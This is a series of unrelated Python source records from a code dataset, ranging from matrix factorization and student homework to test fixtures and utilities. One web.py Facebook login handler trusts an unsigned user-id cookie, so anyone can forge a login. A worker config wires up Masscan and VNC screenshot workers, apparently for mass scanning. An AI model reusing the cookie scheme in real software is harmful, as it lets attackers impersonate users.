\n\tTo compute coefficients for an existing set of basis vectors simply\tcopy W \n\tto sivm_mdl.W, and set compW to False:\n\t\n\t>>> data = np.array([[1.5, 1.3], [1.2, 0.3]])\n\t>>> W = np.array([[1.0, 0.0], [0.0, 1.0]])\n\t>>> sivm_mdl = SIVM(data, num_bases=2, niter=1, compW=False)\n\t>>> sivm_mdl.initialization()\n\t>>> sivm_mdl.W = W\n\t>>> sivm_mdl.factorize()\n\t\n\tThe result is a set of coefficients sivm_mdl.H, s.t. data = W * sivm_mdl.H.\n\t\"\"\"\n\t\n\t_vstring = 'pymf-svmnmf v0.1'\n\n\tdef __init__(self, data, num_bases=4, niter=100, \n\t\t\t\tshow_progress=False, compW=True, compH=True, \n\t\t\t\tdist_measure='l2'):\n\n\t\t# call inherited method\t\t\n\t\tAA.__init__(self, data, num_bases=num_bases, niter=niter, show_progress=show_progress, compW=compW)\n\t\t\t\n\t\tself._dist_measure = dist_measure\t\t\t\n\t\tself._compH = compH\t\t\n\n\t\t# assign the correct distance function\n\t\tif self._dist_measure == 'l1':\n\t\t\t\tself._distfunc = l1_distance\n\t\t\t\t\n\t\telif self._dist_measure == 'l2':\n\t\t\t\tself._distfunc = l2_distance\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\telif self._dist_measure == 'cosine':\t\t\t\t\n\t\t\t\tself._distfunc = cosine_distance\n\t\t\t\t\n\t\telif self._dist_measure == 'kl':\n\t\t\t\tself._distfunc = kl_divergence\t\n\t\t\t\t\t\t\n\t\telif self._dist_measure == 'sparse_graph_l2':\n\t\t\t\tself._distfunc = sparse_graph_l2_distance\n\n\tdef _distance(self, idx):\n\t\t\t# compute distances of a specific data point to all\n\t\t\t# other samples\t\t\t\n\t\t\tif scipy.sparse.issparse(self.data):\n\t\t\t\tstep = self.data.shape[1]\n\t\t\telse:\t\n\t\t\t\tstep = 50000\t\n\t\t\t\t\n\t\t\td = np.zeros((self.data.shape[1],1))\t\t\n\t\t\tvec = self.data[:, idx:idx+1]\t\n\t\t\tself._print_cur_status('compute distance to node ' + str(idx))\t\t\t\t\t\t\t\t\t\n\t\t\tself._prog_bar(np.round(self.data.shape[1]/step))\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t# slice data into smaller chunks\n\t\t\tfor idx_start in range(0,self.data.shape[1],step):\t\t\t\t\t\n\t\t\t\tif idx_start + step > self.data.shape[1]:\n\t\t\t\t\tidx_end = self.data.shape[1]\n\t\t\t\telse:\n\t\t\t\t\tidx_end = idx_start + step\n\n\t\t\t\td[idx_start:idx_end,0:1] = self._distfunc(self.data[:,idx_start:idx_end], vec)\n\t\t\t\tself._update_prog_bar()\t\n\t\t\t\n\t\t\treturn d\n\t\t\n\tdef initialization(self):\n\t\t\t# Fastmap like initialization\n\t\t\t# set the starting index for fastmap initialization\t\t\n\t\t\tcur_p = 0\t\t\n\t\t\tself.select = []\n\t\t\t\n\t\t\t# after 3 iterations the first \"real\" index is found\n\t\t\tfor i in range(3):\t\t\t\t\t\t\t\t\n\t\t\t\td = self._distance(cur_p)\t\t\n\t\t\t\tcur_p = np.argmax(d)\n\t\t\t\t\n\t\t\t# store maximal found distance -> later used for \"a\" (->updateW) \n\t\t\tself._maxd = np.max(d)\t\t\t\t\t\t\n\t\t\tself.select.append(cur_p)\n\t\t\t\t\n\t\t\tif self._compH:\n\t\t\t\tself.H = np.zeros((self._num_bases, self._num_samples))\n\t\t\t\t\n\t\t\tself.W = np.zeros((self._data_dimension, self._num_bases))\n\t\t\tif scipy.sparse.issparse(self.data):\n\t\t\t\tself.W = scipy.sparse.csc_matrix(self.W)\n\n\tdef updateW(self):\t\t\n\t\t\t\t\t\t\t\t\n\t\t# initialize some of the recursively updated distance measures ....\t\t\n\t\td_square = np.zeros((self.data.shape[1],1))\n\t\td_sum = np.zeros((self.data.shape[1],1))\n\t\td_i_times_d_j = np.zeros((self.data.shape[1],1))\n\t\tdistiter = np.zeros((self.data.shape[1],1))\n\t\ta = np.log(self._maxd**2)\n\t\t\n\t\tfor l in range(self._num_bases-1):\t\t\t\t\t\t\t\t\t\t\n\t\t\td = 
self._distance(self.select[-1])\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t# take the log of d**2 (usually more stable that d)\n\t\t\td = np.log(d**2)\t\t\t\n\t\t\td_i_times_d_j += d * d_sum\t\t\t\t\t\t\t\t\t \n\t\t\td_sum += d\n\t\t\td_square += d**2\n\t\t\t\n\t\t\tdistiter = d_i_times_d_j + a*d_sum - ((l + 1.0)/2.0) * d_square\t\t\n\t\t\t\n\t\t\t# remove the selected data point from the list of possible candidates\n\t\t\tdistiter[self.select, :] = -inf\n\t\t\t\n\t\t\t# detect the next best data point\n\t\t\tself._print_cur_status('searching for next best node ...')\t\t\t\t\t\n\t\t\tself.select.append(np.argmax(distiter))\n\t\t\tself._print_cur_status('cur_nodes: ' + str(self.select))\n\n\t\t# sort indices, otherwise h5py won't work\n\t\tself.W = self.data[:, np.sort(self.select)]\n\t\t\n\t\t# \"unsort\" it again to keep the correct order\n\t\tself.W = self.W[:, np.argsort(self.select)]\n\t\t\n\tdef factorize(self):\n\t\t\"\"\"Do factorization s.t. data = dot(dot(data,beta),H), under the convexity constraint\n\t\t\tbeta >=0, sum(beta)=1, H >=0, sum(H)=1\n\t\t\"\"\"\n\t\t# compute new coefficients for reconstructing data points\t\t\n\t\tif self._compW:\n\t\t\tself.updateW()\n\t\t\t\n\t\t# compute H and some error measures\n\t\tif self._compH:\t\t\t\n\t\t\tself.updateH()\t\t\t\t\t\t\t\t\n\t\t\tself.ferr = np.zeros(1)\n\t\t\tif not scipy.sparse.issparse(self.data) :\n\t\t\t\tself.ferr[0] = self.frobenius_norm()\t\t\n\t\t\t\tself._print_cur_status(' FN:' + str(self.ferr[0]))\n\t\t\t\t\t\nif __name__ == \"__main__\":\n\timport doctest \n\tdoctest.testmod()\t","sub_path":"Multi_target/Code/CUR/PyMF-0.1.1/build/lib/pymf/sivm.py","file_name":"sivm.py","file_ext":"py","file_size_in_byte":6968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"430681311","text":"import json\nimport os\nimport time\nimport urllib\nimport urlparse\n\nimport web\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm import sessionmaker\nfrom web.contrib.template import render_jinja\n\nfrom models import engine\nfrom models import User\n\n\nFACEBOOK_APP_ID = \"000000000000000\"\n\nFACEBOOK_APP_SECRET = \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\n\n\nurls = (\n '/', 'MainHandler',\n '/login', 'LoginHandler',\n '/logout', 'LogoutHandler',\n '/periods', 'PeriodsHandler',\n)\n\n\ndef load_sqla(handler):\n web.ctx.orm = scoped_session(sessionmaker(bind=engine))\n try:\n return handler()\n except web.HTTPError:\n web.ctx.orm.commit()\n raise\n except:\n web.ctx.orm.rollback()\n raise\n finally:\n web.ctx.orm.commit()\n\n\napplication = web.application(urls, globals())\napplication.add_processor(load_sqla)\nworking_dir = os.path.dirname(__file__)\nrender = render_jinja(os.path.join(working_dir, '.'), encoding='utf-8')\n\n\ndef path_url():\n return web.ctx.home + web.ctx.fullpath\n\n\nclass BaseHandler():\n def current_user(self):\n \"\"\"Returns the logged in Facebook user or None.\"\"\"\n\n if not hasattr(self, \"_current_user\"):\n self._current_user = None\n user_id = web.cookies().get('fb_user')\n if user_id:\n self._current_user = web.ctx.orm.query(User).filter_by(id=user_id).first()\n\n return self._current_user\n\n\nclass LoginHandler(BaseHandler):\n def GET(self):\n if self.current_user():\n web.seeother('/')\n return\n\n data = web.input(code=None)\n args = dict(client_id=FACEBOOK_APP_ID, redirect_uri=path_url())\n if data.code is None:\n web.seeother(\n 'http://www.facebook.com/dialog/oauth?' 
+\n urllib.urlencode(args))\n return\n\n args['code'] = data.code\n args['client_secret'] = FACEBOOK_APP_SECRET\n response = urlparse.parse_qs(\n urllib.urlopen(\n \"https://graph.facebook.com/oauth/access_token?\" +\n urllib.urlencode(args)).read())\n access_token = response[\"access_token\"][-1]\n profile = json.load(\n urllib.urlopen(\n \"https://graph.facebook.com/me?\" +\n urllib.urlencode(dict(access_token=access_token))))\n\n user = User(id=str(profile[\"id\"]), name=profile[\"name\"],\n access_token=access_token, profile_url=profile[\"link\"])\n user = web.ctx.orm.merge(user) # Merge flying and persistence object\n web.ctx.orm.add(user)\n\n web.setcookie(\n 'fb_user', str(profile['id']), expires=time.time() + 7 * 86400)\n return web.seeother('/')\n\n\nclass LogoutHandler():\n def GET(self):\n web.setcookie('fb_user', '', expires=time.time() - 86400)\n web.seeother('/')\n\n\nclass MainHandler(BaseHandler):\n def GET(self):\n return render.index(user=self.current_user())\n\n\nif __name__ == '__main__':\n application.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"445173033","text":"'''\nBrittany Manuel -- 11449415\nCptS 315\nHomework 1\nmain.py\n'''\n\nfrom helper import *\n\n####################\n# Data Parsing #\n####################\ndef data_parsing(flag):\n \n\n\n ################\n # GET DATA #\n ################\n buckets, items = set_data()\n items = get_items(buckets)\n items.sort()\n if flag: print (\"Data compiled, you have \" + str(len(buckets)) + \" buckets and \" + str(len(items)) + \" unique items.\")\\\n\n\n\n ################\n # SINGLES #\n ################\n #Count singles\n counted = single_count(buckets, items)\n\n #Check support\n supported = support_check(counted, 100)\n if flag: print (\"There are \" + str(len(supported)) + \" supported singles\")\n \n\n\n ################\n # PAIRS #\n ################\n #Make pairs\n pairs = create_pairs(supported)\n pairs = to_dict(pairs)\n if flag: print (\"There are \" + str(len(pairs)) + \" pairs.\")\n \n #Count pairs\n # countedPairs = pair_count(buckets, pairs)\n countedPairs = count(buckets, pairs, True)\n\n #Check support\n supportedPairs = support_check(countedPairs,100)\n if flag: print (\"There are \" + str(len(supportedPairs)) + \" supported pairs\")\n \n #Check implications\n implicationsA = (a_implies_b(supportedPairs, supported, [], True))\n implicationsA = (a_implies_b(supportedPairs, supported, implicationsA, False))\n \n #Sort for lexi, lefthand rule\n for i in range(3):\n implicationsA = sorted(implicationsA, key=lambda row: row[i]) \n\n #Prep for output\n partA = make_list(implicationsA, 5)\n\n\n\n ################\n # TRIPLES #\n ################\n #Make triples\n triples = create_triples(supportedPairs, supported)\n triples = to_dict(triples)\n if flag: print (\"There are \" + str(len(triples)) + \" triples\")\n\n #Count Triples\n # countedTriples = triple_count(buckets, triples)\n countedTriples = count(buckets, triples, False)\n\n #Check support\n supported_triples = support_check(triples, 100)\n if flag: print (\"There are \" + str(len(supported_triples)) + \" supported triples\")\n \n #Check implications\n implicationsB = []\n for i in range(1, 4):\n implicationsB = (ab_implies_c(supported_triples, supportedPairs, implicationsB, i))\n \n #Sort for lexi, lefthand rule\n for i in range(3):\n implicationsB = sorted(implicationsB, key=lambda row: row[i]) 
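\n        # note: Python's sort is stable, so chaining single-key sorts makes the\n        # LAST key applied the primary one -- after this loop the rows end up\n        # ordered by column 2, then column 1, then column 0; iterate i in\n        # reverse (range(2, -1, -1)) for a left-to-right lexicographic order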
\n\n #Prep for output\n partB = make_list(implicationsB, 5)\n\n return partA, partB\n\n\n\n####################\n# Main #\n####################\nif __name__ == '__main__':\n\n start_time = time.time()\n partA, partB = data_parsing(False)\n out_file(partA, partB)\n print(\"Finished in: \" + str(round(time.time() - start_time)) + \" seconds.\")","sub_path":"Homework 1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"470560136","text":"\"\"\" This was originally intended to house per-worker config. It has\ngrown and should be refactored.\n\"\"\"\n\nimport logging\nimport os\nimport socket\nimport workers\n\nfrom setproctitle import setproctitle\n\nfrom tasa.store import connection\n\nlog = logging.getLogger(__name__)\n\ndef run(WorkerClass):\n def wrapped():\n worker = WorkerClass()\n worker_identifier = '%s:%s:%s' % (\n socket.gethostname(), worker.__class__.__name__, os.getpid())\n setproctitle(worker_identifier)\n connection.client_setname(worker_identifier)\n log.info('Started worker: %s' % worker_identifier)\n for job in worker:\n if job:\n log.debug('Completed job: %s', repr(job)[:50])\n return wrapped\n\n# host_regex, func, count\nworkers = [\n {'host': r's\\d+',\n 'func': run(workers.MasscanWorker),\n 'count': 1,\n },\n {'host': r'cloud-worker',\n 'func': run(workers.RFBScreenshotWorker),\n 'count': 20,\n },\n {'host': r'cloud-worker',\n 'func': run(workers.RFBPrintWorker),\n 'count': 80,\n },\n ]\n","sub_path":"looksee/looksee_conf.py","file_name":"looksee_conf.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"411260652","text":"\"\"\"\n==============================\n동심원 데이터 분석(학생한명)\n==============================\n\n학생당 실험당\n\"\"\"\n__author__ = 'byeungchun'\n\nimport h5py\nimport numpy as np\nimport preprocessing as pp\nimport pandas as pd\n\ndef read_student(totalDB):\n dsets = h5py.File(totalDB,'r')\n dset = dsets['d100'] #학생당 실험당 하나 추출\n dset = np.array(dset)\n dset = dset[:,:,50:200] #실험전 -0.4 ~ -0.1초만 추출\n dset = pp.filterByFrequency(dset,[2]) #alpha 채널만 분리\n dset = dset[0,:,:,:] #filterByBrequncy 함수결과가 4차원으로 오기 떄문에 1차원 버림\n return dset\n\ndef calc_stats(dset,cutoffSigma):\n dset_mean_time = dset.mean(axis=2)\n dset_std_time = dset.std(axis=2)\n dset_mean_time_mu =dset_mean_time.mean(axis=1)\n dset_mean_time_sigma = dset_mean_time.std(axis=1)\n lst1sigma = []\n for i in range(dset_mean_time.shape[0]):\n _mu = dset_mean_time_mu[i]\n _sigma = dset_mean_time_sigma[i]\n _arr = dset_mean_time[i,:]\n _arr = np.abs((_arr-_mu) / _sigma)\n _notCutoff = _arr < cutoffSigma\n lst1sigma.append(_notCutoff)\n #dset_norm_abs = np.abs((dset-dset_mean_time_mu) / dset_mean_time_sigma)\n return lst1sigma\n\ndef calc_mean(dset,lst1sigma):\n lstMeanBy1sigma = []\n for i in range(dset.shape[0]):\n _arr = dset[i,lst1sigma[i],:]\n _meanBy1sigma = np.mean(_arr,axis=0)\n lstMeanBy1sigma.append(_meanBy1sigma)\n return lstMeanBy1sigma\n\nfrom sklearn.cluster import KMeans\ndef exe_kmeans(lstMeanBy1sigma):\n _arr = np.array(lstMeanBy1sigma)\n kmeans = KMeans(n_clusters=3)\n kmeans.fit(_arr)\n _cat = kmeans.predict(_arr)\n df = pd.DataFrame(_arr)\n df['cat'] = _cat\n #df[df.cat == 1].ix[:,:-1].T\n #res = df.T\n return df\n\ndef init(cutoffSigma=1):\n totalDB = 'D:/workspace/eeg/minlab/test2.hdf5'\n dset = read_student(totalDB)\n lst1sigma = calc_stats(dset,cutoffSigma)\n 
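# lst1sigma[ch] is a boolean mask over that channel's trials: True where the\n    # trial's mean lies within cutoffSigma standard deviations of the channel\n    # mean; calc_mean below then averages only these non-outlier trials\n    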
lstMeanBy1sigma = calc_mean(dset,lst1sigma)\n\n return lstMeanBy1sigma\n\nif __name__ == \"__main__\":\n init()","sub_path":"sample/eeganalysisbystudent.py","file_name":"eeganalysisbystudent.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"521688219","text":"# THIS CODE IS MY OWN WORK, IT WAS WRITTEN WITHOUT CONSULTING CODE\n# WRITTEN BY OTHER STUDENTS.\n# Simon Marty\n\nimport numpy as np\nimport numpy.testing as npt\nimport time\n\n\ndef gen_random_samples():\n \"\"\"\n Generate 5 million random samples using the\n numpy random.randn module.\n\n Returns\n ----------\n sample : 1d array of size 5 million\n An array of 5 million random samples\n \"\"\"\n return np.random.randn(5000000)\n\n\ndef sum_squares_for(samples: list):\n \"\"\"\n Compute the sum of squares using a forloop\n\n Parameters\n ----------\n samples : 1d-array with shape n\n An array of numbers.\n\n Returns\n -------\n ss : float\n The sum of squares of the samples\n timeElapse: float\n The time it took to calculate the sum of squares (in seconds)\n \"\"\"\n start_time = time.time()\n ss = 0\n mean = np.mean(samples)\n for i in samples:\n ss += pow((i - mean), 2)\n return ss, time.time() - start_time\n\n\ndef sum_squares_np(samples: list):\n \"\"\"\n Compute the sum of squares using Numpy's dot module\n\n Parameters\n ----------\n samples : 1d-array with shape n\n An array of numbers.\n\n Returns\n -------\n ss : float\n The sum of squares of the samples\n timeElapse: float\n The time it took to calculate the sum of squares (in seconds)\n \"\"\"\n start_time = time.time()\n ss = 0\n\n l = samples - np.mean(samples)\n ss = np.dot(l, l)\n\n return ss, time.time() - start_time\n\n\ndef main():\n # generate the random samples\n samples = gen_random_samples()\n # call the sum of squares\n ssFor, timeFor = sum_squares_for(samples)\n # call the numpy version\n ssNp, timeNp = sum_squares_np(samples)\n # make sure they're the same value\n npt.assert_almost_equal(ssFor, ssNp, decimal=5)\n # print out the values\n print(\"Time [sec] (for loop):\", timeFor)\n print(f\"SS: {ssFor}\")\n print(\"Time [sec] (np loop):\", timeNp)\n print(f\"SS: {ssNp}\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cs334-ml/hw1-smarty/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"260212853","text":"import requests\nimport json\nimport sys\n\nfrom django.conf import settings\n\n# from superlists import settings\n#\n# DJANGO_SETTINGS_MODULE = settings\n\n\ndef main():\n SUCCESS = 'OK'\n WARNING = 'WARN'\n ERROR = 'ERROR'\n NONE = 'NONE'\n\n data = {'projectKey': settings.SONAR_PROJECTKEY}\n url = settings.SONAR_URL + '/api/qualitygates/project_status'\n request = requests.get(url=url, params=data)\n\n print(request.status_code)\n if request.status_code == 200:\n print(request.content)\n data = json.loads(request.content)\n project_status = data.get('projectStatus', {})\n status = project_status.get('status', '')\n\n if status == SUCCESS:\n sys.exit(0)\n elif status == WARNING or status == ERROR or status == NONE:\n sys.exit(1)\n else:\n sys.exit(1)\n else:\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scanner_result_process.py","file_name":"scanner_result_process.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"263367030","text":"\"\"\"This module contains functional for Base RP items management.\"\"\"\n\n# Copyright (c) 2023 EPAM Systems\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n\nfrom reportportal_client.core.rp_requests import HttpRequest\n\n\nclass BaseRPItem(object):\n \"\"\"This model stores attributes related to RP item.\"\"\"\n\n def __init__(self, rp_url, session, project_name,\n launch_uuid, generated_id):\n \"\"\"Initialize instance attributes.\n\n :param rp_url: report portal url\n :param session: Session object\n :param project_name: RP project name\n :param launch_uuid: Parent launch UUID\n :param generated_id: Id generated to speed up client\n \"\"\"\n self.uuid = None\n self.weight = None\n self.generated_id = generated_id\n self.http_requests = []\n self.responses = []\n self.rp_url = rp_url\n self.session = session\n self.project_name = project_name\n self.launch_uuid = launch_uuid\n\n @property\n def http_request(self):\n \"\"\"Get last http request.\n\n :return: request object\n \"\"\"\n return self.http_requests[-1] if self.http_requests else None\n\n def add_request(self, endpoint, method, request_class, *args, **kwargs):\n \"\"\"Add new request object.\n\n :param endpoint: request endpoint\n :param method: Session object method. 
Allowable values: get,\n            post, put, delete\n        :param request_class: request class object\n        :param args: request object attributes\n        :param kwargs: request object named attributes\n        :return: None\n        \"\"\"\n        rp_request = request_class(*args, **kwargs)\n        rp_request.http_request = HttpRequest(method, endpoint)\n        rp_request.priority = self.weight\n        self.http_requests.append(rp_request)\n","sub_path":"reportportal_client/items/rp_base_item.py","file_name":"rp_base_item.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620712781","text":"from BinarySearchTree import *\nimport unittest\n\nclass BinarySearchTreeTest(unittest.TestCase):\n    def setUp(self):\n        self.binaryTree = BinarySearchTree()\n        self.binaryTree.addValue(8)\n        self.binaryTree.addValue(3)\n        self.binaryTree.addValue(10)\n        self.binaryTree.addValue(6)\n        self.binaryTree.addValue(1)\n        self.binaryTree.addValue(4)\n        self.binaryTree.addValue(14)\n        self.binaryTree.addValue(7)\n        self.binaryTree.addValue(13)\n\n    def tearDown(self):\n        del self.binaryTree\n\n    def test_treeGen(self):\n        binaryTree = BinarySearchTree()\n        binaryTree.addValue(1000)\n        self.assertEqual(1000, binaryTree.root.getValue())\n\n    def test_addNode(self):\n        binaryTree = BinarySearchTree()\n        binaryTree.addValue(1000)\n        binaryTree.addValue(-10)\n        self.assertEqual(-10, binaryTree.root.lchild.value)\n\n    def test_addSameNode(self):\n        # adding a duplicate value must raise; the old bare 'self.assert_' was a no-op\n        with self.assertRaises(AlreadyExistingValue):\n            self.binaryTree.addValue(8)\n\n    def test_binarySearch(self):\n        node10 = self.binaryTree.binarySearch(10)\n        self.assertEqual(10, node10.value)\n\n    def test_nodeNotFound(self):\n        # searching for a missing value must raise NodeNotFound\n        with self.assertRaises(NodeNotFound):\n            self.binaryTree.binarySearch(-777)\n\n    def test_inOrderTraverse(self):\n        answer = [1, 3, 4, 6, 7, 8, 10, 13, 14]\n        inOrderTraverseList = []\n        for node in self.binaryTree.inOrderTraverse():\n            inOrderTraverseList.append(node.value)\n        self.assertEqual(answer, inOrderTraverseList)\n\n    def test_preOrderTraverse(self):\n        answer = [8, 3, 1, 6, 4, 7, 10, 14, 13]\n        preOrderTraverseList = []\n        for node in self.binaryTree.preOrderTraverse():\n            preOrderTraverseList.append(node.value)\n        self.assertEqual(answer, preOrderTraverseList)\n\n    def test_postOrderTraverse(self):\n        answer = [1, 4, 7, 6, 3, 13, 14, 10, 8]\n        postOrderTraverseList = []\n        for node in self.binaryTree.postOrderTraverse():\n            postOrderTraverseList.append(node.value)\n        self.assertEqual(answer, postOrderTraverseList)\n\n\nif __name__ == \"__main__\":\n    unittest.main()","sub_path":"Data-Structure/data-Structure_python/BinarySearchTreeTest.py","file_name":"BinarySearchTreeTest.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"296526072","text":"# better use regular expressions!!\n# import re\n\n# def solve_runes(runes):\n#     for d in sorted(set(\"0123456789\") - set(runes)):\n#         toTest = runes.replace(\"?\",d)\n#         if re.search(r'([^\\d]|\\b)0\\d+', toTest): continue\n#         l,r = toTest.split(\"=\")\n#         if eval(l) == eval(r): return int(d)\n#     return -1\n\ndef solve_runes(runes):\n    leftDigits = [str(i) for i in range(10)]\n    operatorSign = None\n    for i in range(1,len(runes)):\n        if runes[i].isdigit():\n            if runes[i] in leftDigits:\n                leftDigits.remove(runes[i])\n        if runes[i] == '+':\n            operatorSign = '+'\n            index1 = i\n        if runes[i] == '-':\n            if not operatorSign:\n                operatorSign = '-'\n                index1 = i\n        if runes[i] == '*':\n            operatorSign = '*'\n            index1 
= i\n if runes[i] == '=':\n index2 = i\n print(index1, index2, operatorSign)\n if '0' in leftDigits:\n if (runes[0:2] == '-?' and index1 > 2) or \\\n (runes[index1+1:index1+3] == '-?' and index2 - index1 > 2) or \\\n (runes[index2+1:index2+3] == '-?' and len(runes)-1 - index2 > 2) or \\\n (runes[0] == '?' and index1 > 1) or \\\n (runes[index1+1] == '?' and index2 - index1 > 2) or \\\n (runes[index2+1] == '?' and len(runes)-1 - index2 > 1):\n print(\"0 removed\")\n leftDigits.remove('0')\n\n firstNumber = ''.join(runes[:index1])\n secondNumber = ''.join(runes[index1+1:index2])\n thirdNumber = ''.join(runes[index2+1:])\n\n for n in leftDigits:\n fN = int(firstNumber.replace('?', n))\n sN = int(secondNumber.replace('?', n))\n tN = int(thirdNumber.replace('?', n))\n if operatorSign == '+':\n if fN + sN == tN:\n return int(n)\n if operatorSign == '-':\n if fN - sN == tN:\n return int(n)\n if operatorSign == '*':\n if fN * sN == tN:\n return int(n)\n \n return -1\n\ntestStr = \"123?45*?=?\"\nprint(testStr, solve_runes(testStr))","sub_path":"solveRune.py","file_name":"solveRune.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507998998","text":"def handleError(message):\n print(message)\n prompt()\n\n\ndef extractNumber(phone):\n countryCode = phone[0:3]\n gsmCode = phone[3:5]\n phoneNumber = phone[5:12]\n print(\"You entered: \" + phone + \"\\n\")\n print(\"The country code: \" + countryCode + \"\\n\")\n print(\"The GSM code: \" + gsmCode + \"\\n\")\n print(\"The number: \" + phoneNumber + \"\\n\")\n print('Phone number is: \\n ( {countryCode} ) {gsmCode} - {phoneNumber}'.format(countryCode=countryCode,\n gsmCode=gsmCode,\n phoneNumber=phoneNumber))\n\n\ndef prompt():\n phone = input(\"Please input your number, including the country code, without leading zeros. Enter 0 to exit. \\n\")\n if phone == \"0\":\n print(\"Bye!\")\n exit()\n if not phone.isnumeric():\n return handleError(\"Phone number is invalid\")\n if not len(phone) == 12:\n return handleError(\"Phone number is invalid\")\n return extractNumber(phone)\n\n\nprompt()\n","sub_path":"gsmCode.py","file_name":"gsmCode.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"476690645","text":"import pytest\nfrom appium import webdriver\n\n@pytest.fixture(autouse=True)\ndef open_app():\n desired_caps = {\n 'platformName': 'android',\n 'platformVersion': '5.1.1',\n 'deviceName': '127.0.0.1:21503',\n 'appPackage': 'com.tpshop.malls',\n 'appActivity': '.SPMainActivity',\n 'resetKeyboard': True,\n 'unicodeKeyboard': True,\n 'noReset': True\n }\n driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n return driver\n\n\n\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"118655106","text":"# This code will call a data_seq and slice it using num_of_slices and\n# bp_per_slice. 
Script will take the inputs and return num_of_slices outputs,\n# each with a string length of bp_per_slice.\n\n# The below code might be useful for future stuff.\n# from Bio import SeqIO\n# from Bio.Seq import Seq\n# for seq_record in SeqIO.parse('c_elegans.PRJNA275000.WS267.genomic.fa', 'fasta'):\n\nimport numpy as np\n\nprint(\"Welcome to slice sim!\")\n\n# Create an empty string and an empty list for the original sequence data.\ndata_seq = ''\nlist_lines = []\n\n# If the data is too large, a bytearray could be an option: data_seq_ba = bytearray(data_seq, \"utf-8\")\n\n# Open file, skip any lines starting with '>', remove end formatting, and append the lines to the list of lines.\nwith open('test_fa.txt', 'r') as file1:\n    for line in file1.readlines():\n        if \">\" in line:\n            continue\n        else:\n            line = line.strip(\"\\n\")\n            list_lines.append(line)\n\n# Fill the empty string by joining the list of lines with an empty \"\" separator.\ndata_seq = \"\".join(list_lines)\n\n# The below code was my first attempt, which James Johnson helped me fix to the code seen above.\n# with open('c_elegans.PRJNA275000.WS267.genomic.fa', 'r') as file1:\n#     for i, line in enumerate(file1):\n#         if i == 0 or not line.startswith('>'):\n#             for line in file1:\n#                 line.strip('\\n')\n#                 data_seq.join()\n#                 data_seq_ba.extend()\n\n# Assign variables to user inputs (cast to int) and confirm with a print statement.\nprint(\"Please input a numeric value for the following questions.\")\nnum_of_slices = int(input(\"How many slices? \"))\nbp_per_slice = int(input(\"How many bp per slice? \"))\nprint(\"You have chosen to pick %s slices %s bp in length.\" % (num_of_slices, bp_per_slice))\n\n# Find length of the sequence\ndata_length = len(data_seq)\n\n# Import random package, pick num_of_slices random slice starting positions within the original sequence, then derive each start position's end position for the given slice length.\nimport random\nslice_pos_start = []\nfor x in range(num_of_slices):\n    slice_pos_start.append(random.randint(0, data_length - bp_per_slice))\nslice_pos_end = []\nfor start in slice_pos_start:\n    slice_pos_end.append(start + bp_per_slice)\n\n# Create empty dictionary. Keys are the slice start positions. Values are the slices from data_seq.\nslice_dict = {}\nfor start, end in zip(slice_pos_start, slice_pos_end):\n    slice_dict[start] = data_seq[start:end]\n\n# Create an empty string for the mutated sequence\ndata_seq_mut = ''\n\n# Define a new function called mutate. This code only looks at transitions, not transversions. Maybe I can use this in the future.\n
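# Note (added): transitions swap purine for purine (A<->G) or pyrimidine for pyrimidine (C<->T);\n# transversions (purine <-> pyrimidine) are not modeled here.\n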
